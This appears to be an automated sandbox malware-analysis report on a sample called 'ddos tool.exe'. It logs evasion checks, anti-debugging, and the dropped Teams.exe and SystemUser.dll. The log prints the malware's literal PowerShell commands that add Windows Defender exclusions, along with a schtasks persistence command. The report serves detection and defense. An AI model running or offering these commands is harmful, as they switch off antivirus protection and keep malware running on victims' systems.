                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Check if machine is in data center or colocation facility
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: Teams.exe, 00000004.00000002.2933576803.0000000002B81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: Teams.exe, 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, Teams.exe, 00000004.00000002.2938411155.0000000012B91000.00000004.00000800.00020000.00000000.sdmp, SystemUser.dll.4.dr, Teams.exe.0.drBinary or memory string: SBIEDLL.DLLW7A9FFQBW6PRD1F2LA3LWFEQYGUHKMFYOZKU9AATEWQOEUU4JSDUOAJIRPRDWRFSFW0VRP57JXWPMRI5VZSEIHVO0Y5Q3QJQPRSOUVPS0UD6PMBCHEDFKND7WYNEO5W8AX5CACSNP19FXUK7IKZEB8YTNADD7CNLFZJUZ5FLBF90QFDFAANAWCWPDJDWHPQCN2SIB5R13UJP4GLEU6FZ5LBQEQF05KZZAIHE56W7PLDNSXFMWIWHN7PF0XY6KGBF2EBYZHFVVVPKB315UQZN6GCXUQW1L5HOZYHCZBEUQZ5WWDQRFPJBITBS7IMPLCTVTUIHT8DPG6ZSNXNNDDO0HYQZ9IVSTRT5HZEWYCPIWUGFEQPSB1X653ONP51MD9OLYILZRBTB1IBY4TMSJDJNW1PEF3AZHLKQEZWXW7R5IYBZLDDIY8BHUF6R39ELEAX40EEM6LY46U3RTWUFBUAMEBSUB6DB8MKPWDHK32PF1LFJ1DNCJJOTCYI0FBZF5BAGT0IJOTAL5EIDUEBNMSJ6HFKDJBCCWY8V66QBLGTSPDRMSV7ERZX4SHR7VG1R4OFD5C2N0IIKKRB3B9M5TWMOJONRWRTYJCLABIXSKDUHTYE14KLQP0IGONCBL2PIFD99GUTTCN8KNWLKMGP0DULHWSIPDGSSWYNZFZTFZT663ZWBH0WT8NPIPN7QELGQALH0QLEBXINBZJFSVMXQWJWGA7X1FCMWEOIQDLBP5IFVYFGHIOPKVNI6NHDQ2UCBOLOU4VKVAJVVOQ0MW4VBGBO6R6BSNJNHSCKMUGWTH5ULRHLDDV7OISOQ5SGYIULENALNW7DCEZRPINFO
                  Source: C:\Users\user\Desktop\ddos tool.exeMemory allocated: B30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeMemory allocated: 1AAC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeMemory allocated: 1030000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeMemory allocated: 1AB80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllMemory allocated: 1440000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllMemory allocated: 1B140000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllMemory allocated: 730000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllMemory allocated: 1A500000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\ddos tool.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeWindow / User API: threadDelayed 3368Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeWindow / User API: threadDelayed 6456Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6044Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3793Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7400Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2217Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7464
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1986
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7041
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2499
                  Source: C:\Users\user\Desktop\ddos tool.exe TID: 1536Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exe TID: 5668Thread sleep time: -42427511369531942s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3636Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep count: 7400 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep count: 2217 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1480Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5492Thread sleep count: 7464 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2928Thread sleep count: 1986 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5444Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4508Thread sleep count: 7041 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4148Thread sleep count: 2499 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep time: -4611686018427385s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll TID: 1308Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 3648Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dll TID: 3580Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\ddos tool.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllThread delayed: delay time: 922337203685477
                  Source: Teams.exe.0.drBinary or memory string: vmware
                  Source: svchost.exe, 00000014.00000002.3250098343.000002154DE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3251917361.0000021553642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3251966403.0000021553654000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: ddos tool.exe, 00000000.00000002.1999360980.000000001B5E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}AC
                  Source: Teams.exe, 00000004.00000002.2941830851.000000001B9A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4_2_00007FF848E77A81 CheckRemoteDebuggerPresent,4_2_00007FF848E77A81
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\ddos tool.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe'
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\SystemUser.dll'
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\SystemUser.dll'Jump to behavior
                  Bypasses PowerShell execution policy
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe'
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\lil bot.bat" "Jump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeProcess created: C:\Users\user\AppData\Local\Temp\Teams.exe "C:\Users\user\AppData\Local\Temp\Teams.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Teams.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\SystemUser.dll'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser.dll'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser" /tr "C:\Users\user\AppData\Local\Temp\SystemUser.dll"Jump to behavior
                  Source: C:\Users\user\Desktop\ddos tool.exeQueries volume information: C:\Users\user\Desktop\ddos tool.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Teams.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
